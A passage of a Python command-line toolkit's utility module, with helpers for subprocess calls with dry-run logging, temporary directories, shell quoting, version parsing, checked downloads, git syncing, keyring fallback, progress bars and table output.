dst_mtime = os.stat(dst).st_mtime
dst_f = dst
elif os.path.isdir(dst):
dst_mtime, dst_f = min(map(lambda f: (os.stat(f).st_mtime, f), get_all_files_recursive(dst, dst_exclude)),
key=lambda e: e[0])
else:
raise NotImplementedError
LOGGER.debug(u'Comparing mtimes of {} ({}) with {} ({})'.format(
src_f,
src_mtime,
dst_f,
dst_mtime,
))
return src_mtime < dst_mtime
def call(args, **kwargs):
u"""Run a program and deal with debugging and signals"""
internal = kwargs.get('internal')
if 'internal' in kwargs.keys():
del kwargs['internal']
# deal with backward compatibility
if 'force' in kwargs.keys():
LOGGER.deprecated("'force' argument is deprecated since version 0.9.0, use 'internal' instead.")
internal = kwargs['force']
del kwargs['force']
launcher = kwargs.get('launcher_command')
if 'launcher_command' in kwargs.keys():
del kwargs['launcher_command']
args = [str(arg) for arg in args]
if launcher:
args = launcher + args
args = [str(arg) for arg in args]
message = ' '.join(quote(arg) for arg in args)
action_message = 'run: {}'.format(message)
cwd = kwargs.get('cwd')
if cwd:
action_message = 'in %s, %s' % (cwd, action_message)
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if not dry_run or internal:
_call(args, kwargs)
call_capture_stdout = False
call_merge_stdout_and_stderr = False
def _call(args, kwargs):
signal_hook = kwargs.pop('signal_hook', None)
def signal_handler(num, stack):
if signal_hook:
signal_hook(p, num, stack)
else:
os.kill(p.pid, num)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
if call_merge_stdout_and_stderr:
kwargs['stderr'] = subprocess.STDOUT
if kwargs.pop('to_stderr', False):
kwargs['stdout'] = subprocess.PIPE
if call_capture_stdout:
kwargs['stdout'] = subprocess.PIPE
try:
if call_capture_stdout:
p = subprocess.Popen(args, **kwargs)
stdout = []
while True:
line = p.stdout.readline().decode('utf-8')
print(line[:-1])
stdout.append(line)
if line == u'' and p.poll() is not None:
break
p.wait()
if p.returncode != 0:
raise subprocess.CalledProcessError(p.returncode, args, output=stdout)
else:
p = subprocess.Popen(args, **kwargs)
p.wait()
if p.returncode:
raise subprocess.CalledProcessError(p.returncode, args)
except OSError as e:
raise click.ClickException(u'Failed to call %s: %s' % (args[0], e.strerror))
finally:
signal.signal(signal.SIGINT, signal.SIG_DFL)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
def popen(args, internal=False, **kwargs):
"""Run a program and deal with debugging and signals"""
args = [str(arg) for arg in args]
message = ' '.join(quote(arg) for arg in args)
action_message = 'run: {}'.format(message)
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if not dry_run or internal:
return subprocess.Popen(args, **kwargs)
@contextmanager
def tempdir(dir=None):
u"""Create a temporary to use be in a with statement"""
d = Path(tempfile.mkdtemp(dir=dir))
LOGGER.action(f'Creating a temporary directory at {d}')
try:
yield d
except Exception:
rm(d)
raise
rm(d)
@contextmanager
def temporary_file(dir=None, suffix=None, nameonly=False, content=None):
u"""Create a temporary file to use in a with statement"""
d = tempfile.NamedTemporaryFile(delete=nameonly, suffix=suffix)
if content is not None:
if not isinstance(content, bytes):
content = content.encode('utf8')
d.write(content)
if nameonly or content is not None:
d.close()
LOGGER.action(f'Creating a temporary file at {d.name}')
try:
yield d
except Exception:
if os.path.exists(d.name):
rm(d.name)
raise
if os.path.exists(d.name):
rm(d.name)
@contextmanager
def cd(dir, internal=False, makedirs=False):
u"""Change to a directory temporarily. To be used in a with statement"""
if makedirs:
_makedirs(dir)
if internal:
logger = LOGGER.develop
else:
logger = LOGGER.action
prevdir = os.getcwd()
logger(u'go to directory {}'.format(dir))
if not dry_run:
os.chdir(dir)
LOGGER.debug(u'In directory {}'.format(dir))
yield os.path.realpath(dir)
logger(u'go back into directory {}'.format(prevdir))
if not dry_run:
LOGGER.debug('Back to directory {}'.format(prevdir))
os.chdir(prevdir)
def ccd(dir):
"""Create and change to a directory temporarily. To be used in a with statement"""
LOGGER.deprecated('`ccd(dir)` is deprecated, use `cd(dir, makedirs=True)` instead')
return cd(dir, makedirs=True)
@contextmanager
def updated_env(**kwargs):
u"""Temporarily update the environment. To be used in a with statement"""
oldenv = dict(os.environ)
for k, v in kwargs.items():
if v is None and k in os.environ:
LOGGER.debug('environment %s removed' % k)
del os.environ[k]
else:
LOGGER.debug('environment %s="%s"' % (k, v))
os.environ[k] = v
yield
os.environ.clear()
os.environ.update(oldenv)
@contextmanager
def env(**kwargs):
u"""Temporarily override the environment. To be used in a with statement"""
oldenv = dict(os.environ)
os.environ.clear()
os.environ.update(kwargs)
yield
os.environ.clear()
os.environ.update(oldenv)
def format_opt(opt):
return u'--%s' % opt.replace(u'_', u'-')
def format_options(options, glue=False):
"""Transform the dictionary in a list of options usable in call"""
cmd = []
for opt, value in options.items():
if value is True:
cmd.append(format_opt(opt))
elif isinstance(value, list) or isinstance(value, tuple):
# this is a multi value option
for v in value:
if glue:
cmd.append('{}={}'.format(format_opt(opt), v))
else:
cmd.extend([format_opt(opt), v])
elif value:
if glue:
cmd.append('{}={}'.format(format_opt(opt), value))
else:
cmd.extend([format_opt(opt), value])
return cmd
def cpu_count():
try:
import psutil
return psutil.cpu_count(logical=False)
except ImportError:
import multiprocessing
return multiprocessing.cpu_count()
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {'pre': 'c', 'preview': 'c', '-': 'final-', 'rc': 'c', 'dev': '@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*' + part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
"""Convert a version string to a chronologically-sortable key
This is a rough cross between distutils' StrictVersion and LooseVersion;
if you give it versions that would work with StrictVersion, then it behaves
the same; otherwise it acts like a slightly-smarter LooseVersion. It is
*possible* to create pathological version coding schemes that will fool
this parser, but they should be very rare in practice.
The returned value will be a tuple of strings. Numeric portions of the
version are padded to 8 digits so they will compare numerically, but
without relying on how numbers compare relative to strings. Dots are
dropped, but dashes are retained. Trailing zeros between alpha segments
or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
"2.4". Alphanumeric parts are lower-cased.
The algorithm assumes that strings like "-" and any alpha string that
alphabetically follows "final" represents a "patch level". So, "2.4-1"
is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
considered newer than "2.4-1", which in turn is newer than "2.4".
Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
come before "final" alphabetically) are assumed to be pre-release versions,
so that the version "2.4" is considered newer than "2.4a1".
Finally, to handle miscellaneous cases, the strings "pre", "preview", and
"rc" are treated as if they were "c", i.e. as though they were release
candidates, and therefore are not as new as a version string that does not
contain them, and "dev" is replaced with an '@' so that it sorts lower than
than any other pre-release tag.
"""
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
if part < '*final': # remove '-' before a prerelease tag
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
def safe_check_output(*args, **kwargs):
"""Return the process output or an empty string when the process fail and never raise"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
internal = kwargs.get('internal')
if 'internal' in kwargs:
del kwargs['internal']
# deal with backward compatibility
if 'force' in kwargs.keys():
LOGGER.deprecated("'force' argument is deprecated since version 0.9.0, use 'internal' instead.")
internal = kwargs['force']
del kwargs['force']
action_message = 'run: {}'.format(' '.join(args[0]))
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if dry_run and not internal:
return ''
try:
process = subprocess.Popen(stdout=subprocess.PIPE, *args, **kwargs)
output, _ = process.communicate()
if process.poll():
return ''
else:
return output.decode('utf-8')
except Exception:
return ''
def check_output(cmd, *args, **kwargs):
"""Return the process output"""
if isinstance(cmd, str):
cmd = shlex.split(cmd)
message = ' '.join(quote(str(arg)) for arg in cmd)
try:
nostderr = kwargs.pop('nostderr')
except KeyError:
nostderr = False
try:
internal = kwargs.pop('internal')
except KeyError:
internal = False
try:
safe = kwargs.pop('safe')
except KeyError:
safe = False
# deal with backward compatibility
if 'force' in kwargs.keys():
LOGGER.deprecated("'force' argument is deprecated since version 0.9.0, use 'internal' instead.")
internal = kwargs['force']
del kwargs['force']
action_message = 'run: {}'.format(message)
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if not (dry_run and not internal and not safe):
if call_capture_stdout:
kwargs['stderr'] = subprocess.PIPE
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(cmd, *args, **kwargs)
while True:
line = p.stderr.readline().decode('utf-8')
if not nostderr:
sys.stderr.write(line)
if line == u'' and p.poll() is not None:
break
p.wait()
stdout = p.stdout.read().decode('utf-8')
if p.returncode != 0:
raise subprocess.CalledProcessError(p.returncode, args, output=stdout)
return stdout
else:
if nostderr:
kwargs['stderr'] = subprocess.PIPE
return subprocess.check_output(cmd, *args, **kwargs).decode('utf-8')
def is_pip_install(src_dir):
try:
with cd(src_dir, internal=True):
pip_install = subprocess.Popen(['git', 'rev-parse'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait()
# make sure that src_dir is actually in the project repository (and not in homebrew for example)
pip_install = pip_install or not safe_check_output(['git', 'ls-files'], internal=True)
except OSError:
pip_install = True
return pip_install
def get_netrc_keyring():
netrcfile = os.path.expanduser('~/.netrc')
if os.path.exists(netrcfile) and platform.system() != 'Windows':
chmod(netrcfile, 0o600)
from clk.keyring_netrc import NetrcKeyring
return NetrcKeyring()
def get_keyring():
try:
import keyring
except ModuleNotFoundError:
LOGGER.status('keyring is not installed `pip install keyring`. Falling back on netrc')
from clk.netrc import Netrc
return Netrc()
if isinstance(keyring.core.get_keyring(), keyring.backends.fail.Keyring):
LOGGER.debug('could not find a correct keyring backend, fallback on the netrc one')
from clk.keyring_netrc import NetrcKeyring
keyring.core.set_keyring(NetrcKeyring())
return keyring.core.get_keyring()
def extract(url, dest=Path('.')):
"""Download and extract all the files in the archive at url in dest"""
dest = Path(dest)
import tarfile
import zipfile
from io import BytesIO
makedirs(dest)
r = urlopen(url)
size = int(r.headers['Content-Length'] or r.headers['content-length'])
archname = os.path.basename(url)
archive = BytesIO()
with progressbar(length=size, label='Downloading %s' % archname) as bar:
chunk = r.read(1024)
while chunk:
archive.write(chunk)
bar.update(1024)
chunk = r.read(1024)
archive.seek(0)
if archname.endswith('.zip'):
zipfile.ZipFile(archive).extractall(path=dest)
else:
tarfile.open(fileobj=archive).extractall(dest)
def download(url, outdir=None, outfilename=None, mkdir=False, sha256=None, mode=None):
outdir = outdir or tempfile.mkdtemp()
outfilename = outfilename or os.path.basename(url)
if not os.path.exists(outdir) and mkdir:
makedirs(outdir)
outpath = os.path.join(outdir, outfilename)
LOGGER.action('download %s' % url)
if dry_run:
return outpath
r = urlopen(url)
size = int(r.headers['Content-Length'] or r.headers['content-length'])
outfile = open(outpath, 'wb')
try:
with progressbar(length=size, label='Downloading %s' % os.path.basename(url)) as bar:
chunk = r.read(1024)
while chunk:
outfile.write(chunk)
bar.update(1024)
chunk = r.read(1024)
except BaseException:
outfile.close()
rm(outpath)
raise
outfile.close()
if sha256 is not None:
LOGGER.debug('Checking for corruption')
if hashlib.sha256(open(outpath, 'rb').read()).hexdigest() != sha256:
rm(outpath)
raise click.ClickException('The file at {} was corrupted. It was removed'.format(outpath))
if mode is not None:
os.chmod(outpath, mode)
return Path(outpath)
def part_of_day():
import datetime
hour = datetime.datetime.now().hour
if hour < 11:
return 'morning'
elif 11 <= hour < 13:
return 'lunch'
elif 13 <= hour < 17:
return 'afternoon'
elif 17 <= hour < 18:
return 'tea'
else:
return 'night'
def pid_exists(pidpath):
"""Check whether a program is running or not, based on its pid file"""
LOGGER.develop('Checking %s' % pidpath)
running = False
if os.path.exists(pidpath):
with open(pidpath) as f:
pid = int(f.readline().strip())
try:
import psutil
running = psutil.pid_exists(pid)
if running:
proc = psutil.Process(pid)
running = proc.status() != psutil.STATUS_ZOMBIE
except ImportError:
LOGGER.warn("Can't check the program is actually running. Please install psutils.")
# pid file still exists, so lets say rest is running
running = True
return running
def pid_kill(pidpath, signal=signal.SIGTERM):
"""Send a signal to a process, based on its pid file"""
LOGGER.develop('Checking %s' % pidpath)
if os.path.exists(pidpath):
pid = int(read(pidpath))
LOGGER.action('kill -{} {}'.format(signal, pid))
os.kill(pid, signal)
_find_unsafe = re.compile(r'[^\w@%+=:,./-]').search
def single_quote(s):
"""Return a shell-escaped version of the string *s*."""
if not s:
return "''"
if _find_unsafe(s) is None:
return s
# use single quotes, and put single quotes into double quotes
# the string $'b is then quoted as '$'"'"'b'
return "'" + s.replace("'", "'\"'\"'") + "'"
def double_quote(s):
'''Return a shell-escaped version of the string *s*.'''
if not s:
return '""'
if _find_unsafe(s) is None:
return s
# use double quotes, and put double quotes into single quotes
# the string $"b is then quoted as "$"'"'"b"
return '"' + s.replace('"', '"\'"\'"') + '"'
def quote(s):
"""Quote a string, with either single or double quotes depending on the content"""
sq = single_quote(s)
dq = double_quote(s)
return sq if len(sq) <= len(dq) else dq
def echo_key_value(k, v, alt_style={'dim': True}):
"""Print a key and its associated value with a common style"""
click.echo('%s %s' % (k, click.style(v, **alt_style)))
def echo_json(v):
"""Print a value as formatted and colored json"""
click.echo(colorize_json(v), nl=False)
def colorize_json(v):
"""Format and colorize in json"""
from pygments import formatters, highlight, lexers
return highlight(json_dumps(v), lexers.JsonLexer(), formatters.TerminalFormatter())
def ordered_unique(ls):
"""Return the list with unique elements while keeping the elements ordered by first appearance"""
seen = set()
return [elem for elem in ls if not (elem in seen or seen.add(elem))]
def git_sync(url,
directory,
commit_ish='master',
extra_branches=(),
force=False,
push_url=None,
quiet=False,
last_tag=False,
reset=False,
use_shallow=False):
"""Retrieve and/or update a git repository"""
version = re.search('git version (.+)', safe_check_output(['git', '--version'], internal=True)).group(1)
use_shallow = use_shallow and parse_version(version) >= parse_version('2.1.4') and not last_tag
directory = os.path.abspath(directory or re.split('[:/]', url)[-1])
git_dir = os.path.join(directory, '.git')
ref_file = os.path.abspath(f'{directory}/.git/clk-git-sync-reference')
updated = False
quiet = ['--quiet'] if quiet else []
parent = os.path.dirname(directory)
if not os.path.exists(parent):
makedirs(parent)
if force and os.path.exists(directory):
rm(directory)
if os.path.exists(directory):
assert os.path.exists(git_dir), ('Want to git sync {} in {} but {}'
' already exists and is not a git root'.format(url, directory, directory))
with cd(directory):
if reset:
call(['git', 'reset', '--hard'] + quiet)
call(['git', 'remote', 'set-url', 'origin', url])
# always fetch, just in case something went missing
call(['git', 'fetch', '--tags'] + quiet)
if os.path.exists(ref_file) and open(ref_file).read() != commit_ish:
# reference has changed. Unfortunately we can't continue with the single branch shallow repository
call(['git', 'remote', 'set-branches', 'origin', '*'])
if os.path.exists(f'{directory}/.git/shallow'):
call(['git', 'fetch', '--unshallow', '--tags'] + quiet)
prevrev = check_output(['git', 'rev-parse', 'HEAD'], internal=True)
# just to make sure the user hasn't done anything by himself
if commit_ish:
call(['git', 'checkout'] + quiet + [commit_ish])
if check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'], internal=True).strip() != 'HEAD':
# not in a detached head, ok, we can use pull
call(['git', 'pull'] + quiet)
updated = prevrev != check_output(['git', 'rev-parse', 'HEAD'], internal=True)
else:
commit_ish = commit_ish or 'master'
ref_exists = check_output(['git', 'ls-remote', url, commit_ish], internal=True).strip() != ''
if ref_exists:
call(['git', 'clone'] + quiet + (['--depth', '1'] if use_shallow else []) +
['-b', commit_ish, url, directory])
else:
call(['git', 'clone'] + quiet + ['-n', url, directory])
with cd(directory):
call(['git', 'checkout', commit_ish])
if extra_branches:
with cd(directory):
call(['git', 'remote', 'set-branches', '--add', 'origin'] + list(extra_branches))
call(['git', 'fetch'] + quiet)
# save the reference used, so we can compare it with the asked reference in case of update
if commit_ish:
createfile(ref_file, commit_ish)
if push_url:
with cd(directory):
call(['git', 'remote', 'set-url', '--push', 'origin', push_url])
if last_tag:
with cd(directory):
tag = check_output(['git', 'describe', '--tags', '--abbrev=0']).strip()
call(['git', 'checkout'] + quiet + [tag])
return updated
def get_option_choices(option_name):
"""Returns the choices available for an option in the current context
This is useful to avoid duplicating the choice list."""
context = click_get_current_context_safe()
if not context or not hasattr(context, 'command'):
return ()
options = [o for o in context.command.params if o.name == option_name]
if not options:
return ()
fields = options[0]
if not isinstance(fields.type, click.Choice):
return ()
return fields.type.choices
def clear_ansi_color_codes(v):
"""make sure we don't have any terminal chars"""
if isinstance(v, str):
v = colorama.AnsiToWin32.ANSI_CSI_RE.sub('', v)
v = colorama.AnsiToWin32.ANSI_OSC_RE.sub('', v)
return v
def get_tabulate_formats():
import tabulate
return click.Choice(list(tabulate._table_formats.keys()) + ['csv', 'json', 'key_value', 'json-map', 'json-maps'])
def get_key_values_formats():
return get_tabulate_formats()
def progressbar(iterable=None,
length=None,
label=None,
show_eta=True,
show_percent=None,
show_pos=False,
item_show_func=None,
fill_char='#',
empty_char='-',
bar_template='%(label)s [%(bar)s] %(info)s',
info_sep=' ',
width=36,
file=sys.stderr,
color=None,
clear=True,
disabled=False):
"""This function creates an iterable context manager that can be used
to iterate over something while showing a progress bar. It will
either iterate over the `iterable` or `length` items (that are counted
up). While iteration happens, this function will print a rendered
progress bar to the given `file` (defaults to stdout) and will attempt
to calculate remaining time and more. By default, this progress bar
will not be rendered if the file is not a terminal.
The context manager creates the progress bar. When the context
manager is entered the progress bar is already displayed. With every
iteration over the progress bar, the iterable passed to the bar is
advanced and the bar is updated. When the context manager exits,
a newline is printed and the progress bar is finalized on screen.
No printing must happen or the progress bar will be unintentionally
destroyed.
Example usage::
with progressbar(items) as bar:
for item in bar:
do_something_with(item)
Alternatively, if no iterable is specified, one can manually update the
progress bar through the `update()` method instead of directly
iterating over the progress bar. The update method accepts the number
of steps to increment the bar with::
with progressbar(length=chunks.total_bytes) as bar:
for chunk in chunks:
process_chunk(chunk)
bar.update(chunks.bytes)
.. versionadded:: 2.0
.. versionadded:: 4.0
Added the `color` parameter. Added a `update` method to the
progressbar object.
:param iterable: an iterable to iterate over. If not provided the length
is required.
:param length: the number of items to iterate over. By default the
progressbar will attempt to ask the iterator about its
length, which might or might not work. If an iterable is
also provided this parameter can be used to override the
length. If an iterable is not provided the progress bar
will iterate over a range of that length.
:param label: the label to show next to the progress bar.
:param show_eta: enables or disables the estimated time display. This is
automatically disabled if the length cannot be
determined.
:param show_percent: enables or disables the percentage display. The
default is `True` if the iterable has a length or
`False` if not.
:param show_pos: enables or disables the absolute position display. The
default is `False`.
:param item_show_func: a function called with the current item which
can return a string to show the current item
next to the progress bar. Note that the current
item can be `None`!
:param fill_char: the character to use to show the filled part of the
progress bar.
:param empty_char: the character to use to show the non-filled part of
the progress bar.
:param bar_template: the format string to use as template for the bar.
The parameters in it are ``label`` for the label,
``bar`` for the progress bar and ``info`` for the
info section.
:param info_sep: the separator between multiple info items (eta etc.)
:param width: the width of the progress bar in characters, 0 means full
terminal width
:param file: the file to write to. If this is not a terminal then
only the label is printed.
:param color: controls if the terminal supports ANSI colors or not. The
default is autodetection. This is only needed if ANSI
codes are included anywhere in the progress bar output
which is not the case by default.
"""
if disabled:
return null_context
color = click.termui.resolve_color_default(color)
return ProgressBar(iterable=iterable,
length=length,
show_eta=show_eta,
show_percent=show_percent,
show_pos=show_pos,
item_show_func=item_show_func,
fill_char=fill_char,
empty_char=empty_char,
bar_template=bar_template,
info_sep=info_sep,
file=file,
label=label,
width=width,
color=color,
clear=clear)
class ProgressBar(ProgressBar_):
def __init__(self, clear=True, *args, **kwargs):
self.clear = clear
kwargs.setdefault('file', sys.stderr)
ProgressBar_.__init__(self, *args, **kwargs)
def render_finish(self):
if self.is_hidden:
return
if self.clear and platform.system() != 'Windows':
AFTER_BAR = '\r\033[2K\033[?25h'
self.file.write(AFTER_BAR)
self.file.flush()
else:
ProgressBar_.render_finish(self)
def __iter__(self):
self.render_progress()
return self
def __next__(self):
if self.is_hidden:
return next(self.iter)
try:
rv = next(self.iter)
self.current_item = rv
except StopIteration:
self.finish()
self.render_progress()
if not self.entered:
self.render_finish()
raise StopIteration()
else:
self.update(1)
return rv
def get_close_matches(words, possibilities, n=3, cutoff=0.6):
"""Use SequenceMatcher to return list of the best "good enough" matches.
word is a sequence for which close matches are desired (typically a
string).
possibilities is a list of sequences against which to match word
(typically a list of strings).
Optional arg n (default 3) is the maximum number of close matches to
return. n must be > 0.
Optional arg cutoff (default 0.6) is a float in [0, 1]. Possibilities
that don't score at least that similar to word are ignored.
The best (no more than n) matches among the possibilities are returned
in a list, sorted by similarity score, most similar first.
>>> get_close_matches("appel", ["ape", "apple", "peach", "puppy"])
['apple', 'ape']
>>> import keyword as _keyword
>>> get_close_matches("wheel", _keyword.kwlist)
['while']
>>> get_close_matches("apple", _keyword.kwlist)
[]
>>> get_close_matches("accept", _keyword.kwlist)
['except']
"""
if not n > 0:
raise ValueError('n must be > 0: %r' % (n, ))
if not 0.0 <= cutoff <= 1.0:
raise ValueError('cutoff must be in [0.0, 1.0]: %r' % (cutoff, ))
if not isinstance(words, list):
words = [words]
result = []
s = difflib.SequenceMatcher()
for word in words:
s.set_seq2(word)
for x in possibilities:
s.set_seq1(x)
if s.real_quick_ratio() >= cutoff and \
s.quick_ratio() >= cutoff and \
s.ratio() >= cutoff:
result.append((s.ratio(), x))
# Move the best scorers to head of list
result = heapq.nlargest(n, result)
# Strip scores for the best n matches
return [x for score, x in result]
def json_dump_file(path, content, internal=False):
"""Dump a python object to a file using a nicely formated json format"""
createfile(path, json_dumps(content), internal=internal)
def json_dumps(content):
"""Dump a python object using a nicely formated json format"""
return json.dumps(content, indent=4, sort_keys=True).replace(' \n', '\n') + '\n'
def grep(
file_list,
args=None,
pager=True,
):
args = args or []
args = [quote(arg) for arg in args]
color_opt = ['--color=always'] if sys.stdout.isatty() else []
xargs = subprocess.Popen('xargs -0 grep ' + ' '.join(color_opt + list(args)) + (' | less' if pager else ''),
stdin=subprocess.PIPE,
shell=True)
xargs.communicate(input='\0'.join(file_list).encode('utf-8'))
xargs.wait()
class NullContext:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def update(self, foo):
"""Fake update method to mimic the progress bar API"""
pass
null_context = NullContext()
class Spinner(object):
spinner_cycle = itertools.cycle(['-', '\\', '|', '/'])
def __init__(self, message=''):
self.stop_running = None
self.spin_thread = None
self.message = message
def start(self):
if sys.stderr.isatty():
if self.message:
sys.stderr.write(self.message + ' ')
self.stop_running = threading.Event()
self.spin_thread = threading.Thread(target=self.init_spin)
self.spin_thread.start()
elif self.message:
LOGGER.status(self.message)
def stop(self):
if self.spin_thread:
self.stop_running.set()
self.spin_thread.join()
if self.message:
sys.stderr.write('\b' * (len(self.message) + 1))
sys.stderr.write(' ' * (len(self.message) + 2))
sys.stderr.write('\b' * (len(self.message) + 2))
sys.stderr.flush()
def init_spin(self):
while not self.stop_running.is_set():
sys.stderr.write(next(self.spinner_cycle))
sys.stderr.flush()
time.sleep(0.25)
sys.stderr.write('\b')
sys.stderr.flush()
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
return False
def update(self, foo):
"""Fake update method to mimic the progress bar API"""
pass
def spinner(disabled=False, message=''):
if disabled:
return null_context
return Spinner(message)
def read(f):
"""Read a file an return its content in utf-8"""
return open(f, 'rb').read().decode('utf-8')
def natural_delta(value):
"""Given a timedelta or a number of seconds, return a natural
representation of the amount of time elapsed. This is similar to
``natural_time``, but does not add tense to the result."""
date, delta = date_and_delta(value)
if date is None:
return value
seconds = abs(delta.seconds)
hours = seconds // 3600
seconds = seconds % 3600
minutes = seconds // 60
seconds = seconds % 60
days = abs(delta.days)
years = days // 365
days = days % 365
if years:
return '%s year%s %s day%s' % (years, 's' if years > 1 else '', days, 's' if days > 1 else '')
elif days:
return '%s day%s %s hour%s' % (days, 's' if days > 1 else '', hours, 's' if hours > 1 else '')
elif hours:
return '%s hour%s %s minute%s' % (hours, 's' if hours > 1 else '', minutes, 's' if minutes > 1 else '')
elif minutes:
return '%s minute%s %s second%s' % (minutes, 's' if minutes > 1 else '', seconds, 's' if seconds > 1 else '')
elif delta.microseconds:
seconds = seconds + abs(delta.microseconds) / 10.**6
return '%1.3f second%s' % (seconds, 's' if seconds > 1 else '')
return '%s second%s' % (seconds, 's' if seconds > 1 else '')
def natural_time(value, future=False, months=True):
"""Given a datetime or a number of seconds, return a natural representation
of that time in a resolution that makes sense. This is more or less
compatible with Django's ``naturaltime`` filter. ``future`` is ignored for
datetimes, where the tense is always figured out based on the current time.
If an integer is passed, the return value will be past tense by default,
unless ``future`` is set to True."""
from datetime import datetime, timedelta
import dateutil.tz
from humanize.time import _, naturaldelta
now = datetime.now(dateutil.tz.tzlocal())
date, delta = date_and_delta(value)
if date is None:
return value
# determine tense by value only if datetime/timedelta were passed
if isinstance(value, (datetime, timedelta)):
future = date > now
ago = _('%s from now') if future else _('%s ago')
delta = naturaldelta(delta, months)
if delta == _('a moment'):
return _('now')
return ago % delta
def date_and_delta(value):
"""Turn a value into a date and a timedelta which represents how long ago
it was. If that's not possible, return (None, value)."""
from datetime import datetime, timedelta
import dateutil.tz
from humanize.time import _abs_timedelta
now = datetime.now(dateutil.tz.tzlocal())
if isinstance(value, datetime):
date = value
delta = now - value
elif isinstance(value, timedelta):
date = now - value
delta = value
else:
try:
value = int(value)
delta = timedelta(seconds=value)
date = now - delta
except (ValueError, TypeError):
return (None, value)
return date, _abs_timedelta(delta)
def read_cmakecache(file):
content = open(file).read()
return dict(re.findall('^([a-zA-Z_]+)(?::[^=]+=)(.+)$', content, flags=re.MULTILINE))
class ParameterType(click.ParamType):
def __init__(self):
click.ParamType.__init__(self)
if not hasattr(self, 'name'):
self.name = self.__class__.__name__
if self.name.endswith('Type'):
self.name = self.name[:-len('Type')]
if not self.name:
class_name = self.__class__.__name__
self.name = re.sub('(Param(eter|)|)Type$', '', class_name)
# switch to snake case
self.name = re.sub('([a-z])([A-Z])', '\\1_\\2', self.name).lower()
# remove the prefix if it match the module
self.name = re.sub('^%s(_|)' % self.__module__.split('.')[-1].lower(), '', self.name)
@contextmanager
def json_file(location):
if (not os.path.exists(location) or open(location, 'r').read().strip() == ''):
open(location, 'w').write('{}')
values = json.load(open(location))
oldvalues = deepcopy(values)
yield values
if values != oldvalues:
json.dump(values, open(location, 'w'))
def flat_map(elem):
"""Transform a list of list in a list with all the elements of the nested lists
>>> flat_map([[1, 2, 3], [4, 5]])
[1, 2, 3, 4, 5]
"""
elem = list(elem)
return functools.reduce(list.__add__, elem) if elem else []
def subkwargs(kwargs, params):
return {key: value for key, value in kwargs.items() if key in params}
def deprecated_module(src, dst):
stack = traceback.extract_stack()
def get_frame_info(frame):
filename = frame.filename
lineno = frame.lineno
line = frame.line
return filename, lineno, line
# find a relevant frame
frame = [
frame for frame in stack[:-2]
if 'frozen' not in get_frame_info(frame)[0] and 'pluginbase' not in get_frame_info(frame)[0]
][-1]
filename, lineno, line = get_frame_info(frame)
return ("{}:{} '{}' =>"
' Importing {} is deprecated, import {} instead').format(filename, lineno, line, src, dst)
class TablePrinter(object):
direct_output_formats = ['key_value', 'csv']
def __init__(self, fields=(), tablefmt=None, separator=' ', headers=(), **options):
fields = fields or self.fields_from_context()
headers = headers or self.headers_from_context()
self._tablefmt = tablefmt or self.format_from_context() or 'simple'
self._options = options
self._headers = fields or headers
self._separator = separator
self._data = []
self._field_indices = [headers.index(f) for f in fields]
@staticmethod
def headers_from_context():
return get_option_choices('fields')
@staticmethod
def fields_from_context():
context = click_get_current_context_safe()
if not context or not hasattr(context, 'params'):
return ()
return context.params.get('fields', ())
@staticmethod
def format_from_context():
context = click_get_current_context_safe()
if not context or not hasattr(context, 'params'):
return ()
return context.params.get('format', ())
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._tablefmt not in self.direct_output_formats:
click.echo(tabulate(self._data, self._headers, tablefmt=self._tablefmt, **self._options))
def echo(self, *args, stripped=False):
if self._field_indices and not stripped:
args = [args[i] for i in self._field_indices]
cleaned_args = []
for arg in args:
if isinstance(arg, (tuple, list)):
arg = self._separator.join(arg)
cleaned_args.append(arg)
if self._tablefmt in self.direct_output_formats:
click.echo(tabulate([cleaned_args], self._headers, tablefmt=self._tablefmt, **self._options))
else:
self._data.append(cleaned_args)
def echos(self, ls):
for elem in ls:
self.echo(*elem)
def echo_records(self, records):
for record in records:
self.echo(*[record[value] for value in self.headers_from_context()])
def tabulate(tabular_data,
headers=(),
tablefmt='simple',
floatfmt='g',
numalign='decimal',
stralign='left',
missingval=''):
"""Tabulate the data"""
from tabulate import tabulate as tabulate_
if tablefmt == 'key_value':
from clk.config import config
data = []
for kv in tabular_data:
if len(kv) > 1:
data.append('%s %s' % (kv[0], click.style(u' '.join(to_string(v) for v in kv[1:]), **config.alt_style)))
else:
data.append(str(kv[0]))
return '\n'.join(data)
elif tablefmt == 'csv':
import csv
f = csv.StringIO()
csvwriter = csv.writer(f)
csvwriter.writerows(tabular_data)
f.seek(0)
return f.read().rstrip('\n')
elif tablefmt == 'json':
import collections
json_data = []
if not headers and tabular_data:
headers = ['key%s' % i for i in range(len(tabular_data[0]))]
for ls in tabular_data:
d = collections.OrderedDict()
for i, v in enumerate(ls):
if isinstance(v, str):
v = clear_ansi_color_codes(v)
d[headers[i]] = v
json_data.append(d)
return colorize_json(json_data)
elif tablefmt == 'json-map':
return colorize_json(
dict(
